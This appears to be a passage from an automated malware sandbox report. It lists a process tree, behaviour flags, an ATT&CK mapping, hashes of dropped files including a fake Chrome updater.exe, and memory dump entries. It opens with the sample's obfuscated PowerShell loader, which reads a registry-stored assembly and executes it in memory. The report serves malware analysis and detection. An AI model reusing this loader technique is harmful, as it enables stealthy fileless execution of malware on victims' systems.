C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1712

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2020

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
1⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1952

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
2.8MB

MD5
eb27bb8cfa99d659e4fe023e9002ecd1

SHA1
c783400302fdfae0518269c5a5a8d4bad29f42a3

SHA256
9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f

SHA512
ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2

Download Submit
C:\Program Files\Google\Chrome\updater.exe
Filesize
2.8MB

MD5
eb27bb8cfa99d659e4fe023e9002ecd1

SHA1
c783400302fdfae0518269c5a5a8d4bad29f42a3

SHA256
9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f

SHA512
ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2

Download Submit
C:\Program Files\Google\Libs\g.log
Filesize
198B

MD5
37dd19b2be4fa7635ad6a2f3238c4af1

SHA1
e5b2c034636b434faee84e82e3bce3a3d3561943

SHA256
8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

SHA512
86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
d51cf41bb1ea80f10a1fc6c16f9678da

SHA1
3f346a8b1d2c7c47f39f5a070f4b45b8e1e301a1

SHA256
efe22adb0f4b8b380ef586ddc044ce935105d08f8521ae69c552e4135640d06b

SHA512
af6f6bd5b15bea96d204e69f24c5580e73e67659f9b465b8451aece2cdba18f20f2d9b51d24768052f9fa0f022eff44a1bb36dbe2690dd54c9029164b818d298

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
d51cf41bb1ea80f10a1fc6c16f9678da

SHA1
3f346a8b1d2c7c47f39f5a070f4b45b8e1e301a1

SHA256
efe22adb0f4b8b380ef586ddc044ce935105d08f8521ae69c552e4135640d06b

SHA512
af6f6bd5b15bea96d204e69f24c5580e73e67659f9b465b8451aece2cdba18f20f2d9b51d24768052f9fa0f022eff44a1bb36dbe2690dd54c9029164b818d298

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9LR5CPP0SSWB3M2EG46R.temp
Filesize
7KB

MD5
d51cf41bb1ea80f10a1fc6c16f9678da

SHA1
3f346a8b1d2c7c47f39f5a070f4b45b8e1e301a1

SHA256
efe22adb0f4b8b380ef586ddc044ce935105d08f8521ae69c552e4135640d06b

SHA512
af6f6bd5b15bea96d204e69f24c5580e73e67659f9b465b8451aece2cdba18f20f2d9b51d24768052f9fa0f022eff44a1bb36dbe2690dd54c9029164b818d298

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Program Files\Google\Chrome\updater.exe
Filesize
2.8MB

MD5
eb27bb8cfa99d659e4fe023e9002ecd1

SHA1
c783400302fdfae0518269c5a5a8d4bad29f42a3

SHA256
9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f

SHA512
ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2

Download Submit
memory/420-147-0x0000000000340000-0x000000000036A000-memory.dmp

Filesize
168KB

Download
memory/420-139-0x0000000000310000-0x0000000000333000-memory.dmp

Filesize
140KB

Download
memory/420-141-0x0000000000310000-0x0000000000333000-memory.dmp

Filesize
140KB

Download
memory/420-144-0x0000000036CF0000-0x0000000036D00000-memory.dmp

Filesize
64KB

Download
memory/420-143-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmp

Filesize
64KB

Download
memory/420-142-0x0000000000340000-0x000000000036A000-memory.dmp

Filesize
168KB

Download
memory/420-191-0x0000000000340000-0x000000000036A000-memory.dmp

Filesize
168KB

Download
memory/420-151-0x0000000076D01000-0x0000000076D02000-memory.dmp

Filesize
4KB

Download
memory/468-152-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmp

Filesize
64KB

Download
memory/468-165-0x00000000008D0000-0x00000000008FA000-memory.dmp

Filesize
168KB

Download
memory/468-154-0x0000000036CF0000-0x0000000036D00000-memory.dmp

Filesize
64KB

Download
memory/468-150-0x00000000008D0000-0x00000000008FA000-memory.dmp

Filesize
168KB

Download
memory/476-161-0x0000000036CF0000-0x0000000036D00000-memory.dmp

Filesize
64KB

Download
memory/476-158-0x0000000000230000-0x000000000025A000-memory.dmp

Filesize
168KB

Download
memory/476-160-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmp

Filesize
64KB

Download
memory/948-82-0x000000013FC00000-0x000000013FEC8000-memory.dmp

Filesize
2.8MB

Download
memory/948-58-0x000000013FC00000-0x000000013FEC8000-memory.dmp

Filesize
2.8MB

Download
memory/1192-163-0x000000013FFC0000-0x0000000140288000-memory.dmp

Filesize
2.8MB

Download
memory/1192-202-0x000000013FFC0000-0x0000000140288000-memory.dmp

Filesize
2.8MB

Download
memory/1192-216-0x000000013FFC0000-0x0000000140288000-memory.dmp

Filesize
2.8MB

Download
memory/1560-190-0x00000000003B0000-0x00000000003D1000-memory.dmp

Filesize
132KB

Download
memory/1560-180-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/1560-188-0x0000000000120000-0x000000000013B000-memory.dmp

Filesize
108KB

Download
memory/1560-176-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/1560-186-0x0000000000120000-0x000000000013B000-memory.dmp

Filesize
108KB

Download
memory/1560-178-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/1560-179-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/1684-224-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1684-228-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1684-236-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1684-230-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1684-232-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1684-234-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1684-226-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1684-221-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1684-217-0x00000000000E0000-0x0000000000100000-memory.dmp

Filesize
128KB

Download
memory/1712-184-0x00000000738B0000-0x0000000073E5B000-memory.dmp

Filesize
5.7MB

Download
memory/1712-117-0x0000000001160000-0x00000000011A0000-memory.dmp

Filesize
256KB

Download
memory/1712-164-0x00000000738B0000-0x0000000073E5B000-memory.dmp

Filesize
5.7MB

Download
memory/1712-115-0x00000000738B0000-0x0000000073E5B000-memory.dmp

Filesize
5.7MB

Download
memory/1712-173-0x0000000001160000-0x00000000011A0000-memory.dmp

Filesize
256KB

Download
memory/1712-116-0x00000000738B0000-0x0000000073E5B000-memory.dmp

Filesize
5.7MB

Download
memory/1712-168-0x0000000001160000-0x00000000011A0000-memory.dmp

Filesize
256KB

Download
memory/1712-167-0x0000000001160000-0x00000000011A0000-memory.dmp

Filesize
256KB

Download
memory/1712-166-0x00000000738B0000-0x0000000073E5B000-memory.dmp

Filesize
5.7MB

Download
memory/1712-118-0x0000000001160000-0x00000000011A0000-memory.dmp

Filesize
256KB

Download
memory/1712-175-0x0000000076EA0000-0x0000000076F76000-memory.dmp

Filesize
856KB

Download
memory/1876-174-0x0000000001030000-0x00000000010B0000-memory.dmp

Filesize
512KB

Download
memory/1876-169-0x000007FEF4690000-0x000007FEF502D000-memory.dmp

Filesize
9.6MB

Download
memory/1876-170-0x0000000001030000-0x00000000010B0000-memory.dmp

Filesize
512KB

Download
memory/1876-171-0x0000000001030000-0x00000000010B0000-memory.dmp

Filesize
512KB

Download
memory/1876-172-0x000007FEF4690000-0x000007FEF502D000-memory.dmp

Filesize
9.6MB

Download
memory/1876-185-0x000007FEF4690000-0x000007FEF502D000-memory.dmp

Filesize
9.6MB

Download
memory/1944-104-0x00000000028B0000-0x0000000002930000-memory.dmp

Filesize
512KB

Download
memory/1944-65-0x00000000028B0000-0x0000000002930000-memory.dmp

Filesize
512KB

Download
memory/1944-64-0x00000000028B0000-0x0000000002930000-memory.dmp

Filesize
512KB

Download
memory/1944-63-0x000007FEF5030000-0x000007FEF59CD000-memory.dmp

Filesize
9.6MB

Download
memory/1944-61-0x00000000028B4000-0x00000000028B7000-memory.dmp

Filesize
12KB

Download
memory/1944-62-0x000007FEF5030000-0x000007FEF59CD000-memory.dmp

Filesize
9.6MB

Download
memory/1944-60-0x0000000002220000-0x0000000002228000-memory.dmp

Filesize
32KB

Download
memory/1944-59-0x000000001B300000-0x000000001B5E2000-memory.dmp

Filesize
2.9MB

Download
memory/2020-137-0x0000000076CB0000-0x0000000076E59000-memory.dmp

Filesize
1.7MB

Download
memory/2020-123-0x0000000076A90000-0x0000000076BAF000-memory.dmp

Filesize
1.1MB

Download
memory/2020-135-0x0000000000F20000-0x0000000000FA0000-memory.dmp

Filesize
512KB

Download
memory/2020-110-0x000007FEF5030000-0x000007FEF59CD000-memory.dmp

Filesize
9.6MB

Download
memory/2020-132-0x000007FEF5030000-0x000007FEF59CD000-memory.dmp

Filesize
9.6MB

Download
memory/2020-112-0x0000000000F20000-0x0000000000FA0000-memory.dmp

Filesize
512KB

Download
memory/2020-129-0x000007FEF5030000-0x000007FEF59CD000-memory.dmp

Filesize
9.6MB

Download
memory/2020-113-0x0000000000F20000-0x0000000000FA0000-memory.dmp

Filesize
512KB

Download
memory/2020-111-0x0000000000F20000-0x0000000000FA0000-memory.dmp

Filesize
512KB

Download
memory/2020-114-0x000007FEF5030000-0x000007FEF59CD000-memory.dmp

Filesize
9.6MB

Download
memory/2020-138-0x0000000076A90000-0x0000000076BAF000-memory.dmp

Filesize
1.1MB

Download
memory/2020-119-0x0000000000F20000-0x0000000000FA0000-memory.dmp

Filesize
512KB

Download
memory/2020-121-0x0000000076CB0000-0x0000000076E59000-memory.dmp

Filesize
1.7MB

Download
memory/2020-120-0x00000000011C0000-0x0000000001200000-memory.dmp

Filesize
256KB

Download
memory/2080-79-0x000007FEF4690000-0x000007FEF502D000-memory.dmp

Filesize
9.6MB

Download
memory/2080-75-0x000007FEF4690000-0x000007FEF502D000-memory.dmp

Filesize
9.6MB

Download
memory/2080-76-0x0000000002550000-0x00000000025D0000-memory.dmp

Filesize
512KB

Download
memory/2080-72-0x0000000002520000-0x0000000002528000-memory.dmp

Filesize
32KB

Download
memory/2080-74-0x0000000002550000-0x00000000025D0000-memory.dmp

Filesize
512KB

Download
memory/2080-73-0x000007FEF4690000-0x000007FEF502D000-memory.dmp

Filesize
9.6MB

Download
memory/2080-71-0x000000001B2C0000-0x000000001B5A2000-memory.dmp

Filesize
2.9MB

Download
memory/2080-77-0x0000000002550000-0x00000000025D0000-memory.dmp

Filesize
512KB

Download
memory/2080-78-0x0000000002550000-0x00000000025D0000-memory.dmp

Filesize
512KB

Download
memory/2368-124-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/2368-181-0x0000000076CB0000-0x0000000076E59000-memory.dmp

Filesize
1.7MB

Download
memory/2368-133-0x0000000076CB0000-0x0000000076E59000-memory.dmp

Filesize
1.7MB

Download
memory/2368-131-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/2368-128-0x0000000076A90000-0x0000000076BAF000-memory.dmp

Filesize
1.1MB

Download
memory/2368-127-0x0000000076CB0000-0x0000000076E59000-memory.dmp

Filesize
1.7MB

Download
memory/2368-126-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/2612-219-0x0000000140000000-0x0000000140049000-memory.dmp

Filesize
292KB

Download
memory/2736-107-0x000007FEF5030000-0x000007FEF59CD000-memory.dmp

Filesize
9.6MB

Download
memory/2736-94-0x0000000002880000-0x0000000002900000-memory.dmp

Filesize
512KB

Download
memory/2736-92-0x0000000002880000-0x0000000002900000-memory.dmp

Filesize
512KB

Download
memory/2736-89-0x000007FEF5030000-0x000007FEF59CD000-memory.dmp

Filesize
9.6MB

Download
memory/2736-90-0x0000000002880000-0x0000000002900000-memory.dmp

Filesize
512KB

Download
memory/2736-91-0x000007FEF5030000-0x000007FEF59CD000-memory.dmp

Filesize
9.6MB

Download
memory/2736-93-0x0000000002880000-0x0000000002900000-memory.dmp

Filesize
512KB

Download
memory/2932-106-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download